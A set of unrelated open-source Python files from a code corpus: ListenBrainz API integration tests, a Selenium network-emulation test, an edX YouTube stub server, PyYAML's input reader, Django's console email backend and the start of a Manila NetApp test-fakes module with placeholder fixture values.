self.fail("did not alias mbcs")
def test_sitecustomize_executed(self):
# If sitecustomize is available, it should have been imported.
if "sitecustomize" not in sys.modules:
try:
import sitecustomize
except ImportError:
pass
else:
self.fail("sitecustomize not imported automatically")
def test_main():
run_unittest(HelperFunctionsTests, ImportSideEffectTests)
if __name__ == "__main__":
test_main()
| apache-2.0 |
paramsingh/listenbrainz-server | listenbrainz/tests/integration/test_api.py | 1 | 19685 | import sys
import os
import uuid
from listenbrainz.tests.integration import IntegrationTestCase
from flask import url_for
from redis import Redis
import listenbrainz.db.user as db_user
import time
import json
from listenbrainz.webserver.views.api_tools import is_valid_uuid
class APITestCase(IntegrationTestCase):
def setUp(self):
super(APITestCase, self).setUp()
self.user = db_user.get_or_create(1, 'testuserpleaseignore')
def tearDown(self):
r = Redis(host=self.app.config['REDIS_HOST'], port=self.app.config['REDIS_PORT'])
r.flushall()
super(APITestCase, self).tearDown()
def test_get_listens(self):
""" Test to make sure that the api sends valid listens on get requests.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send a listen
ts = int(time.time())
payload['payload'][0]['listened_at'] = ts
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
# This sleep allows for the influx subscriber to take its time in getting
# the listen submitted from redis and writing it to influx.
# Removing it causes an empty list of listens to be returned.
time.sleep(2)
url = url_for('api_v1.get_listens', user_name = self.user['musicbrainz_id'])
response = self.client.get(url, query_string = {'count': '1'})
self.assert200(response)
data = json.loads(response.data)['payload']
# make sure user id is correct
self.assertEqual(data['user_id'], self.user['musicbrainz_id'])
# make sure that count is 1 and list also contains 1 listen
self.assertEqual(data['count'], 1)
self.assertEqual(len(data['listens']), 1)
# make sure timestamp is the same as sent
sent_time = payload['payload'][0]['listened_at']
self.assertEqual(data['listens'][0]['listened_at'], sent_time)
self.assertEqual(data['listens'][0]['track_metadata']['track_name'], 'Fade')
self.assertEqual(data['listens'][0]['track_metadata']['artist_name'], 'Kanye West')
self.assertEqual(data['listens'][0]['track_metadata']['release_name'], 'The Life of Pablo')
# make sure that artist msid, release msid and recording msid are present in data
self.assertTrue(is_valid_uuid(data['listens'][0]['recording_msid']))
self.assertTrue(is_valid_uuid(data['listens'][0]['track_metadata']['additional_info']['artist_msid']))
self.assertTrue(is_valid_uuid(data['listens'][0]['track_metadata']['additional_info']['release_msid']))
# check for latest listen timestamp
self.assertEqual(data['latest_listen_ts'], ts)
# request with min_ts should work
response = self.client.get(url, query_string = {'min_ts': int(time.time())})
self.assert200(response)
# request with max_ts lesser than the timestamp of the submitted listen
# should not send back any listens, should report a good latest_listen timestamp
response = self.client.get(url, query_string = {'max_ts': ts - 2})
self.assert200(response)
self.assertListEqual(response.json['payload']['listens'], [])
self.assertEqual(response.json['payload']['latest_listen_ts'], ts)
# checkt that recent listens are fectched correctly
url = url_for('api_v1.get_recent_listens_for_user_list', user_list = self.user['musicbrainz_id'])
response = self.client.get(url, query_string = {'count': '1'})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 2)
def send_data(self, payload):
""" Sends payload to api.submit_listen and return the response
"""
return self.client.post(
url_for('api_v1.submit_listen'),
data = json.dumps(payload),
headers = {'Authorization': 'Token {}'.format(self.user['auth_token'])},
content_type = 'application/json'
)
def test_unauthorized_submission(self):
""" Test for checking that unauthorized submissions return 401
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# request with no authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data = json.dumps(payload),
content_type = 'application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
# request with invalid authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data = json.dumps(payload),
headers = {'Authorization' : 'Token testtokenplsignore'},
content_type = 'application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
def test_valid_single(self):
""" Test for valid submissioon of listen_type listen
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
def test_single_more_than_one_listen(self):
""" Test for an invalid submission which has listen_type 'single' but
more than one listen in payload
"""
with open(self.path_to_data_file('single_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_playing_now(self):
""" Test for valid submission of listen_type 'playing_now'
"""
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assert200(r)
self.assertEqual(r.json['payload']['count'], 1)
def test_playing_now_with_duration(self):
""" Test that playing now listens with durations expire
"""
with open(self.path_to_data_file('playing_now_with_duration.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_duration_ms(self):
""" Test that playing now submissions with duration_ms also expire
"""
with open(self.path_to_data_file('playing_now_with_duration_ms.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_ts(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
timestamp 'listened_at'
"""
with open(self.path_to_data_file('playing_now_with_ts.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_playing_now_more_than_one_listen(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
more than one listen in payload
"""
with open(self.path_to_data_file('playing_now_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_import(self):
""" Test for a valid submission of listen_type 'import'
"""
with open(self.path_to_data_file('valid_import.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
def test_too_large_listen(self):
""" Test for invalid submission in which the overall size of the listens sent is more than
10240 bytes
"""
with open(self.path_to_data_file('too_large_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_many_tags_in_listen(self):
""" Test for invalid submission in which a listen contains more than the allowed
number of tags in additional_info.
"""
with open(self.path_to_data_file('too_many_tags.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_long_tag(self):
""" Test for invalid submission in which a listen contains a tag of length > 64
"""
with open(self.path_to_data_file('too_long_tag.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_release_mbid(self):
""" Test for invalid submission in which a listen contains an invalid release_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_release_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_artist_mbid(self):
""" Test for invalid submission in which a listen contains an invalid artist_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_artist_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_recording_mbid(self):
""" Test for invalid submission in which a listen contains an invalid recording_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_recording_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_additional_info(self):
""" Test to make sure that user generated data present in additional_info field
of listens is preserved
"""
with open(self.path_to_data_file('additional_info.json'), 'r') as f:
payload = json.load(f)
payload['payload'][0]['listened_at'] = int(time.time())
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
# wait for influx-writer to get its work done before getting the listen back
time.sleep(2)
url = url_for('api_v1.get_listens', user_name = self.user['musicbrainz_id'])
response = self.client.get(url, query_string = {'count': '1'})
self.assert200(response)
data = json.loads(response.data)['payload']
sent_additional_info = payload['payload'][0]['track_metadata']['additional_info']
received_additional_info = data['listens'][0]['track_metadata']['additional_info']
self.assertEqual(sent_additional_info['best_song'], received_additional_info['best_song'])
self.assertEqual(sent_additional_info['link1'], received_additional_info['link1'])
self.assertEqual(sent_additional_info['link2'], received_additional_info['link2'])
self.assertEqual(sent_additional_info['other_stuff'], received_additional_info['other_stuff'])
self.assertEqual(sent_additional_info['nested']['info'], received_additional_info['nested.info'])
self.assertListEqual(sent_additional_info['release_type'], received_additional_info['release_type'])
self.assertEqual(sent_additional_info['spotify_id'], received_additional_info['spotify_id'])
self.assertEqual(sent_additional_info['isrc'], received_additional_info['isrc'])
self.assertEqual(int(sent_additional_info['tracknumber']), received_additional_info['tracknumber'])
self.assertEqual(sent_additional_info['release_group_mbid'], received_additional_info['release_group_mbid'])
self.assertListEqual(sent_additional_info['work_mbids'], received_additional_info['work_mbids'])
self.assertListEqual(sent_additional_info['artist_mbids'], received_additional_info['artist_mbids'])
self.assertListEqual(sent_additional_info['non_official_list'], received_additional_info['non_official_list'])
self.assertNotIn('track_name', sent_additional_info)
self.assertNotIn('artist_name', sent_additional_info)
self.assertNotIn('release_name', sent_additional_info)
def test_latest_import(self):
""" Test for api.latest_import """
# initially the value of latest_import will be 0
response = self.client.get(url_for('api_v1.latest_import'), query_string={'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], 0)
# now an update
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token {token}'.format(token=self.user['auth_token'])}
)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
# now the value must have changed
response = self.client.get(url_for('api_v1.latest_import'), query_string={'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], val)
def test_latest_import_unauthorized(self):
""" Test for invalid tokens passed to user.latest_import view"""
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token thisisinvalid'}
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
def test_latest_import_unknown_user(self):
"""Tests api.latest_import without a valid username"""
response = self.client.get(url_for('api_v1.latest_import'), query_string={'user_name': ''})
self.assert404(response)
self.assertEqual(response.json['code'], 404)
def test_multiple_artist_names(self):
""" Tests multiple artist names in artist_name field of data """
with open(self.path_to_data_file('artist_name_list.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual('artist_name must be a single string.', response.json['error'])
def test_too_high_timestamps(self):
""" Tests for timestamps greater than current time """
with open(self.path_to_data_file('timestamp_in_ns.json'), 'r') as f:
payload = json.load(f)
payload['listened_at'] = int(time.time()) * 10**9
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual('Value for key listened_at is too high.', response.json['error'])
def test_invalid_token_validation(self):
"""Sends an invalid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, query_string = {"token":"invalidtoken"})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token invalid.', response.json['message'])
self.assertFalse(response.json['valid'])
self.assertNotIn('user_name', response.json)
def test_valid_token_validation(self):
"""Sends a valid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, query_string = {"token":self.user['auth_token']})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token valid.', response.json['message'])
self.assertTrue(response.json['valid'])
self.assertEqual(response.json['user_name'], self.user['musicbrainz_id'])
def test_get_playing_now(self):
""" Test for valid submission and retrieval of listen_type 'playing_now'
"""
r = self.client.get(url_for('api_v1.get_playing_now', user_name='thisuserdoesnotexist'))
self.assert404(r)
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
self.assertEqual(len(r.json['payload']['listens']), 0)
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now', user_name=self.user['musicbrainz_id']))
self.assertTrue(r.json['payload']['playing_now'])
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(len(r.json['payload']['listens']), 1)
self.assertEqual(r.json['payload']['user_id'], self.user['musicbrainz_id'])
self.assertEqual(r.json['payload']['listens'][0]['track_metadata']['artist_name'], 'Kanye West')
self.assertEqual(r.json['payload']['listens'][0]['track_metadata']['release_name'], 'The Life of Pablo')
self.assertEqual(r.json['payload']['listens'][0]['track_metadata']['track_name'], 'Fade')
| gpl-2.0 |
krmahadevan/selenium | py/test/selenium/webdriver/chrome/chrome_network_emulation_tests.py | 29 | 1252 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium.webdriver import Chrome
def test_network_conditions_emulation():
driver = Chrome()
driver.set_network_conditions(
offline=False,
latency=56, # additional latency (ms)
throughput=789)
conditions = driver.get_network_conditions()
assert conditions['offline'] is False
assert conditions['latency'] == 56
assert conditions['download_throughput'] == 789
assert conditions['upload_throughput'] == 789
| apache-2.0 |
nicolas-petit/website | website_no_crawler/__init__.py | 26 | 1025 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2015 B-Informed (<http://www.b-informed.nl>).
# Author: Roel Adriaans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| agpl-3.0 |
shubhdev/openedx | common/djangoapps/terrain/stubs/youtube.py | 39 | 6111 | """
Stub implementation of YouTube for acceptance tests.
To start this stub server on its own from Vagrant:
1.) Locally, modify your Vagrantfile so that it contains:
config.vm.network :forwarded_port, guest: 8031, host: 8031
2.) From within Vagrant dev environment do:
cd common/djangoapps/terrain
python -m stubs.start youtube 8031
3.) Locally, try accessing http://localhost:8031/ and see that
you get "Unused url" message inside the browser.
"""
from .http import StubHttpRequestHandler, StubHttpService
import json
import time
import requests
from urlparse import urlparse
from collections import OrderedDict
class StubYouTubeHandler(StubHttpRequestHandler):
"""
A handler for Youtube GET requests.
"""
# Default number of seconds to delay the response to simulate network latency.
DEFAULT_DELAY_SEC = 0.5
def do_DELETE(self): # pylint: disable=invalid-name
"""
Allow callers to delete all the server configurations using the /del_config URL.
"""
if self.path == "/del_config" or self.path == "/del_config/":
self.server.config = dict()
self.log_message("Reset Server Configuration.")
self.send_response(200)
else:
self.send_response(404)
def do_GET(self):
"""
Handle a GET request from the client and sends response back.
"""
self.log_message(
"Youtube provider received GET request to path {}".format(self.path)
)
if 'get_config' in self.path:
self.send_json_response(self.server.config)
elif 'test_transcripts_youtube' in self.path:
if 't__eq_exist' in self.path:
status_message = "".join([
'<?xml version="1.0" encoding="utf-8" ?>',
'<transcript><text start="1.0" dur="1.0">',
'Equal transcripts</text></transcript>'
])
self.send_response(
200, content=status_message, headers={'Content-type': 'application/xml'}
)
elif 't_neq_exist' in self.path:
status_message = "".join([
'<?xml version="1.0" encoding="utf-8" ?>',
'<transcript><text start="1.1" dur="5.5">',
'Transcripts sample, different that on server',
'</text></transcript>'
])
self.send_response(
200, content=status_message, headers={'Content-type': 'application/xml'}
)
else:
self.send_response(404)
elif 'test_youtube' in self.path:
params = urlparse(self.path)
youtube_id = params.path.split('/').pop()
if self.server.config.get('youtube_api_private_video'):
self._send_private_video_response(youtube_id, "I'm youtube private video.")
else:
self._send_video_response(youtube_id, "I'm youtube.")
elif 'get_youtube_api' in self.path:
if self.server.config.get('youtube_api_blocked'):
self.send_response(404, content='', headers={'Content-type': 'text/plain'})
else:
# Get the response to send from YouTube.
# We need to do this every time because Google sometimes sends different responses
# as part of their own experiments, which has caused our tests to become "flaky"
self.log_message("Getting iframe api from youtube.com")
iframe_api_response = requests.get('https://www.youtube.com/iframe_api').content.strip("\n")
self.send_response(200, content=iframe_api_response, headers={'Content-type': 'text/html'})
else:
self.send_response(
404, content="Unused url", headers={'Content-type': 'text/plain'}
)
def _send_video_response(self, youtube_id, message):
"""
Send message back to the client for video player requests.
Requires sending back callback id.
"""
# Delay the response to simulate network latency
time.sleep(self.server.config.get('time_to_response', self.DEFAULT_DELAY_SEC))
# Construct the response content
callback = self.get_params['callback']
youtube_metadata = json.loads(
requests.get(
"http://gdata.youtube.com/feeds/api/videos/{id}?v=2&alt=jsonc".format(id=youtube_id)
).text
)
data = OrderedDict({
'data': OrderedDict({
'id': youtube_id,
'message': message,
'duration': youtube_metadata['data']['duration'],
})
})
response = "{cb}({data})".format(cb=callback, data=json.dumps(data))
self.send_response(200, content=response, headers={'Content-type': 'text/html'})
self.log_message("Youtube: sent response {}".format(message))
def _send_private_video_response(self, message):
"""
Send private video error message back to the client for video player requests.
"""
# Construct the response content
callback = self.get_params['callback']
data = OrderedDict({
"error": OrderedDict({
"code": 403,
"errors": [
{
"code": "ServiceForbiddenException",
"domain": "GData",
"internalReason": "Private video"
}
],
"message": message,
})
})
response = "{cb}({data})".format(cb=callback, data=json.dumps(data))
self.send_response(200, content=response, headers={'Content-type': 'text/html'})
self.log_message("Youtube: sent response {}".format(message))
class StubYouTubeService(StubHttpService):
"""
A stub Youtube provider server that responds to GET requests to localhost.
"""
HANDLER_CLASS = StubYouTubeHandler
| agpl-3.0 |
nchursin/json2apex | helpers/pyyaml/reader.py | 272 | 6854 | # This module contains abstractions for the input stream. You don't have to
# looks further, there are no pretty code.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position to `length` characters.
# reader.index - the number of the current character.
# reader.line, stream.column - the line and the column of the current character.
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
def __init__(self, name, position, character, encoding, reason):
self.name = name
self.character = character
self.position = position
self.encoding = encoding
self.reason = reason
def __str__(self):
if isinstance(self.character, bytes):
return "'%s' codec can't decode byte #x%02x: %s\n" \
" in \"%s\", position %d" \
% (self.encoding, ord(self.character), self.reason,
self.name, self.position)
else:
return "unacceptable character #x%04x: %s\n" \
" in \"%s\", position %d" \
% (self.character, self.reason,
self.name, self.position)
class Reader(object):
# Reader:
# - determines the data encoding and converts it to a unicode string,
# - checks if characters are in allowed range,
# - adds '\0' to the end.
# Reader accepts
# - a `bytes` object,
# - a `str` object,
# - a file-like object with its `read` method returning `str`,
# - a file-like object with its `read` method returning `unicode`.
# Yeah, it's ugly and slow.
def __init__(self, stream):
self.name = None
self.stream = None
self.stream_pointer = 0
self.eof = True
self.buffer = ''
self.pointer = 0
self.raw_buffer = None
self.raw_decode = None
self.encoding = None
self.index = 0
self.line = 0
self.column = 0
if isinstance(stream, str):
self.name = "<unicode string>"
self.check_printable(stream)
self.buffer = stream+'\0'
elif isinstance(stream, bytes):
self.name = "<byte string>"
self.raw_buffer = stream
self.determine_encoding()
else:
self.stream = stream
self.name = getattr(stream, 'name', "<file>")
self.eof = False
self.raw_buffer = None
self.determine_encoding()
def peek(self, index=0):
try:
return self.buffer[self.pointer+index]
except IndexError:
self.update(index+1)
return self.buffer[self.pointer+index]
def prefix(self, length=1):
if self.pointer+length >= len(self.buffer):
self.update(length)
return self.buffer[self.pointer:self.pointer+length]
def forward(self, length=1):
if self.pointer+length+1 >= len(self.buffer):
self.update(length+1)
while length:
ch = self.buffer[self.pointer]
self.pointer += 1
self.index += 1
if ch in '\n\x85\u2028\u2029' \
or (ch == '\r' and self.buffer[self.pointer] != '\n'):
self.line += 1
self.column = 0
elif ch != '\uFEFF':
self.column += 1
length -= 1
def get_mark(self):
if self.stream is None:
return Mark(self.name, self.index, self.line, self.column,
self.buffer, self.pointer)
else:
return Mark(self.name, self.index, self.line, self.column,
None, None)
def determine_encoding(self):
while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
self.update_raw()
if isinstance(self.raw_buffer, bytes):
if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
self.raw_decode = codecs.utf_16_le_decode
self.encoding = 'utf-16-le'
elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
self.raw_decode = codecs.utf_16_be_decode
self.encoding = 'utf-16-be'
else:
self.raw_decode = codecs.utf_8_decode
self.encoding = 'utf-8'
self.update(1)
NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD]')
def check_printable(self, data):
match = self.NON_PRINTABLE.search(data)
if match:
character = match.group()
position = self.index+(len(self.buffer)-self.pointer)+match.start()
raise ReaderError(self.name, position, ord(character),
'unicode', "special characters are not allowed")
def update(self, length):
if self.raw_buffer is None:
return
self.buffer = self.buffer[self.pointer:]
self.pointer = 0
while len(self.buffer) < length:
if not self.eof:
self.update_raw()
if self.raw_decode is not None:
try:
data, converted = self.raw_decode(self.raw_buffer,
'strict', self.eof)
except UnicodeDecodeError as exc:
character = self.raw_buffer[exc.start]
if self.stream is not None:
position = self.stream_pointer-len(self.raw_buffer)+exc.start
else:
position = exc.start
raise ReaderError(self.name, position, character,
exc.encoding, exc.reason)
else:
data = self.raw_buffer
converted = len(data)
self.check_printable(data)
self.buffer += data
self.raw_buffer = self.raw_buffer[converted:]
if self.eof:
self.buffer += '\0'
self.raw_buffer = None
break
def update_raw(self, size=4096):
data = self.stream.read(size)
if self.raw_buffer is None:
self.raw_buffer = data
else:
self.raw_buffer += data
self.stream_pointer += len(data)
if not data:
self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
| apache-2.0 |
beni55/django | django/core/mail/backends/console.py | 696 | 1477 | """
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
from django.utils import six
class EmailBackend(BaseEmailBackend):
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stdout)
self._lock = threading.RLock()
super(EmailBackend, self).__init__(*args, **kwargs)
def write_message(self, message):
msg = message.message()
msg_data = msg.as_bytes()
if six.PY3:
charset = msg.get_charset().get_output_charset() if msg.get_charset() else 'utf-8'
msg_data = msg_data.decode(charset)
self.stream.write('%s\n' % msg_data)
self.stream.write('-' * 79)
self.stream.write('\n')
def send_messages(self, email_messages):
"""Write all messages to the stream in a thread-safe way."""
if not email_messages:
return
msg_count = 0
with self._lock:
try:
stream_created = self.open()
for message in email_messages:
self.write_message(message)
self.stream.flush() # flush after each message
msg_count += 1
if stream_created:
self.close()
except Exception:
if not self.fail_silently:
raise
return msg_count
| bsd-3-clause |
bswartz/manila | manila/tests/share/drivers/netapp/dataontap/client/fakes.py | 1 | 86084 | # Copyright (c) 2015 Clinton Knight. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mock
from six.moves import urllib
from manila.share.drivers.netapp.dataontap.client import api
CONNECTION_INFO = {
'hostname': 'hostname',
'transport_type': 'https',
'port': 443,
'username': 'admin',
'password': 'passw0rd',
'api_trace_pattern': '(.*)',
}
CLUSTER_NAME = 'fake_cluster'
REMOTE_CLUSTER_NAME = 'fake_cluster_2'
CLUSTER_ADDRESS_1 = 'fake_cluster_address'
CLUSTER_ADDRESS_2 = 'fake_cluster_address_2'
VERSION = 'NetApp Release 8.2.1 Cluster-Mode: Fri Mar 21 14:25:07 PDT 2014'
VERSION_NO_DARE = 'NetApp Release 9.1.0: Tue May 10 19:30:23 2016 <1no-DARE>'
VERSION_TUPLE = (9, 1, 0)
NODE_NAME = 'fake_node1'
NODE_NAMES = ('fake_node1', 'fake_node2')
VSERVER_NAME = 'fake_vserver'
VSERVER_NAME_2 = 'fake_vserver_2'
ADMIN_VSERVER_NAME = 'fake_admin_vserver'
NODE_VSERVER_NAME = 'fake_node_vserver'
NFS_VERSIONS = ['nfs3', 'nfs4.0']
ROOT_AGGREGATE_NAMES = ('root_aggr1', 'root_aggr2')
ROOT_VOLUME_AGGREGATE_NAME = 'fake_root_aggr'
ROOT_VOLUME_NAME = 'fake_root_volume'
SHARE_AGGREGATE_NAME = 'fake_aggr1'
SHARE_AGGREGATE_NAMES = ('fake_aggr1', 'fake_aggr2')
SHARE_AGGREGATE_RAID_TYPES = ('raid4', 'raid_dp')
SHARE_AGGREGATE_DISK_TYPE = 'FCAL'
SHARE_AGGREGATE_DISK_TYPES = ['SATA', 'SSD']
SHARE_NAME = 'fake_share'
SHARE_SIZE = '1000000000'
SHARE_NAME_2 = 'fake_share_2'
SNAPSHOT_NAME = 'fake_snapshot'
CG_SNAPSHOT_ID = 'fake_cg_id'
PARENT_SHARE_NAME = 'fake_parent_share'
PARENT_SNAPSHOT_NAME = 'fake_parent_snapshot'
MAX_FILES = 5000
LANGUAGE = 'fake_language'
SNAPSHOT_POLICY_NAME = 'fake_snapshot_policy'
EXPORT_POLICY_NAME = 'fake_export_policy'
DELETED_EXPORT_POLICIES = {
VSERVER_NAME: [
'deleted_manila_fake_policy_1',
'deleted_manila_fake_policy_2',
],
VSERVER_NAME_2: [
'deleted_manila_fake_policy_3',
],
}
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
QOS_MAX_THROUGHPUT = '5000B/s'
USER_NAME = 'fake_user'
PORT = 'e0a'
VLAN = '1001'
VLAN_PORT = 'e0a-1001'
IP_ADDRESS = '10.10.10.10'
NETMASK = '255.255.255.0'
GATEWAY = '10.10.10.1'
SUBNET = '10.10.10.0/24'
NET_ALLOCATION_ID = 'fake_allocation_id'
LIF_NAME_TEMPLATE = 'os_%(net_allocation_id)s'
LIF_NAME = LIF_NAME_TEMPLATE % {'net_allocation_id': NET_ALLOCATION_ID}
IPSPACE_NAME = 'fake_ipspace'
BROADCAST_DOMAIN = 'fake_domain'
MTU = 9000
SM_SOURCE_VSERVER = 'fake_source_vserver'
SM_SOURCE_VOLUME = 'fake_source_volume'
SM_DEST_VSERVER = 'fake_destination_vserver'
SM_DEST_VOLUME = 'fake_destination_volume'
NETWORK_INTERFACES = [{
'interface_name': 'fake_interface',
'address': IP_ADDRESS,
'vserver': VSERVER_NAME,
'netmask': NETMASK,
'role': 'data',
'home-node': NODE_NAME,
'home-port': VLAN_PORT
}]
NETWORK_INTERFACES_MULTIPLE = [
{
'interface_name': 'fake_interface',
'address': IP_ADDRESS,
'vserver': VSERVER_NAME,
'netmask': NETMASK,
'role': 'data',
'home-node': NODE_NAME,
'home-port': VLAN_PORT,
},
{
'interface_name': 'fake_interface_2',
'address': '10.10.12.10',
'vserver': VSERVER_NAME,
'netmask': NETMASK,
'role': 'data',
'home-node': NODE_NAME,
'home-port': PORT,
}
]
IPSPACES = [{
'uuid': 'fake_uuid',
'ipspace': IPSPACE_NAME,
'id': 'fake_id',
'broadcast-domains': ['OpenStack'],
'ports': [NODE_NAME + ':' + VLAN_PORT],
'vservers': [
IPSPACE_NAME,
VSERVER_NAME,
]
}]
EMS_MESSAGE = {
'computer-name': 'fake_host',
'event-id': '0',
'event-source': 'fake driver',
'app-version': 'fake app version',
'category': 'fake category',
'event-description': 'fake description',
'log-level': '6',
'auto-support': 'false',
}
QOS_POLICY_GROUP = {
'policy-group': QOS_POLICY_GROUP_NAME,
'vserver': VSERVER_NAME,
